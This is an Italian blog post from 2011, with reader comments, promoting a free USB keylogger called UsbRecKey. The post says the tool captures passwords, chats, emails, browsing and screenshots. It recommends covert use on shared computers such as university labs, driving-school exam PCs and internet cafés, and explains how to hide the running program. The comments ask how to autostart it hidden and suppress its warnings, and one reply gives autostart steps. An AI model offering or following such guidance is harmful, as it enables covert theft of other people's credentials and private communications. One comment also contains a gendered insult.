giovedì 10 novembre 2011

Keylogger su usb gratis!

UsbRecKey è il più piccolo e il più efficace software keylogger da usare su pen drive USB. Il software è leggero e compatibile con qualsiasi sistema Windows. Registra automaticamente nella penn drive USB un file log con l'elenco di tutte le applicazioni in uso sul computer ed il testo digitato all'interno di tali applicazioni (conversazioni di chat, mail, documenti, nomi utente, password, etc) (Registratore di Tasti).
Registra le navigazioni effettuate con tutti i più comuni browser e salva le schermate del desktop ogni 30 secondi, ma è possibile scegliere un intervallo di tempo a piacere.
Il software è ideale per chi ha necessità di monitorare computer per un determinato lasso di tempo e di non lasciare alcuna traccia sul computer dopo il periodo di monitoraggio.
Un esempio può essere :
  • Aule Universitarie
  • Computer Scuola Guida (quelli usati per gli esami)
  • Internet Cafè
  • Aule Informatiche
Il software è completamente gratuito e non è necessaria la registrazione per il download. Per l'installazione è necessario indicare il percorso della pen drive USB (di almeno un 1 Gb) al resto penserà il software.

Per l'utilizzo invece bastarà inserire la pen drive in un computer con Windows XP / Seven / Vista o Windows Server, lanciare dalla pen drive il file UsbRecKey. Nella pagina principale del software impostiamo la frequenza di acquisizione dei print screen, poi premiamo Shift+F9 per nasconderlo e lasciarlo attivo in memoria.
Per leggere il file contenente tutte le registrazioni basterà andare nella pen drive USB e aprire il file di testo con la data che ci interessa, per esempio quello di oggi alle ore 16:21:20 sarà "log_11-16-11_16-21-20.txt"
Per vedere i print screen dello schermo basterà andare nella cartella SnapShots della pen drive.
 
Finestra principale di UsbRecKey - Software Keylogger su usb
 
Il software è gratuito ed è possibile prelevarlo da qui
Arrivederci al prossimo Articolo
OcchiolinoMichele Balzano

 

13 commenti:

  1. salve,è possibile modificare usbreckey per far si che parta in automatico all'avvio del PC?
    Questa è la domanda di Steave.
    Rispondo in mofo che sia utile a tutti:
    Inserire l'eseguibile e la cartella dei print screen in c:\ e creare una collegamento all'eseguibile nell'esecuzione automatica

    RispondiElimina
  2. E PER FARLO PARTIRE AUTOMATICAMENTE IN MODALITA' NASCOSTA? C'E' QUALCHE STRINGA PARTICOLARE DA INSERIRE MAGARI IN UN FILE .BAT?

    RispondiElimina
  3. Non c'è la possibilità di eliminare la finestra di avvertimendo che esce quando si tenta di arrestare il sistema con il logger attivo in background?

    RispondiElimina
  4. buongiorno, non mi parte su windows 7

    RispondiElimina
  5. il download non funziona!!

    RispondiElimina
  6. confermo non funziona il download!!!!

    RispondiElimina
  7. Tripla conferma che il download non funziona!

    RispondiElimina
  8. Il download non va!!!!!!!!!!!!!!!!!!!

    RispondiElimina
  9. io non trovo il file UsbRecKey dentro la cartella

    RispondiElimina
  10. http://usbreckey.codeplex.com vero link

    RispondiElimina
  11. mamma mia che massa di cialtroni! bisogna sempre imboccarvi come dei bambini, al posto che piagnucolare "non va, non va, non va" come delle femminucce, non potete con le manine, digitare su google il nome del programma e trovarlo da voi, visto che ve l'ha suggerito l'autore? o deve venire pure a casa a installarvelo ?

    RispondiElimina
  12. Ho dezippato il file Usbreckey_Source.zip sulla chiavetta, ma ora non ho capito come installarlo e farlo partire. Insomma non c'è un file "EXE".

    RispondiElimina

Post più popolari